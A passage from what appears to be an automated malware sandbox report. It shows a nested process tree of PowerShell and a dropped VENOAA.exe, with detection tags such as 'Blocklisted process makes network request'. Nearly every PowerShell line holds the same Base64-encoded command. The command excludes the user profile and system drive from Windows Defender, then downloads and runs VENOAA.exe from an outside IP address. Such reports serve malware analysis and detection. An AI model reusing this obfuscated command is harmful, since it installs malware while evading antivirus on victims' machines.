ACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="56⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4960 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"57⤵
- Executes dropped EXE
PID:5028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="58⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3220 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"59⤵
- Checks computer location settings
- Executes dropped EXE
PID:3172 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="60⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4932 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"61⤵
- Checks computer location settings
- Executes dropped EXE
PID:3012 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="62⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3256 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"63⤵
- Executes dropped EXE
PID:2552 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="64⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1852 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"65⤵
- Checks computer location settings
- Executes dropped EXE
PID:4040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="66⤵
- Suspicious use of AdjustPrivilegeToken
PID:1040 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"67⤵
- Executes dropped EXE
PID:116 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="68⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:1264 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"69⤵
- Checks computer location settings
- Executes dropped EXE
PID:3496 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="70⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:3964 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV171⤵PID:4932
-
-
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"71⤵
- Executes dropped EXE
PID:4020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="72⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:1856 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"73⤵
- Checks computer location settings
- Executes dropped EXE
PID:1684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="74⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4868 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"75⤵
- Executes dropped EXE
PID:4356 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="76⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2496 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"77⤵
- Checks computer location settings
- Executes dropped EXE
PID:1040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="78⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2852 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"79⤵
- Executes dropped EXE
PID:432 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="80⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2484 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"81⤵
- Checks computer location settings
- Executes dropped EXE
PID:3564 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABl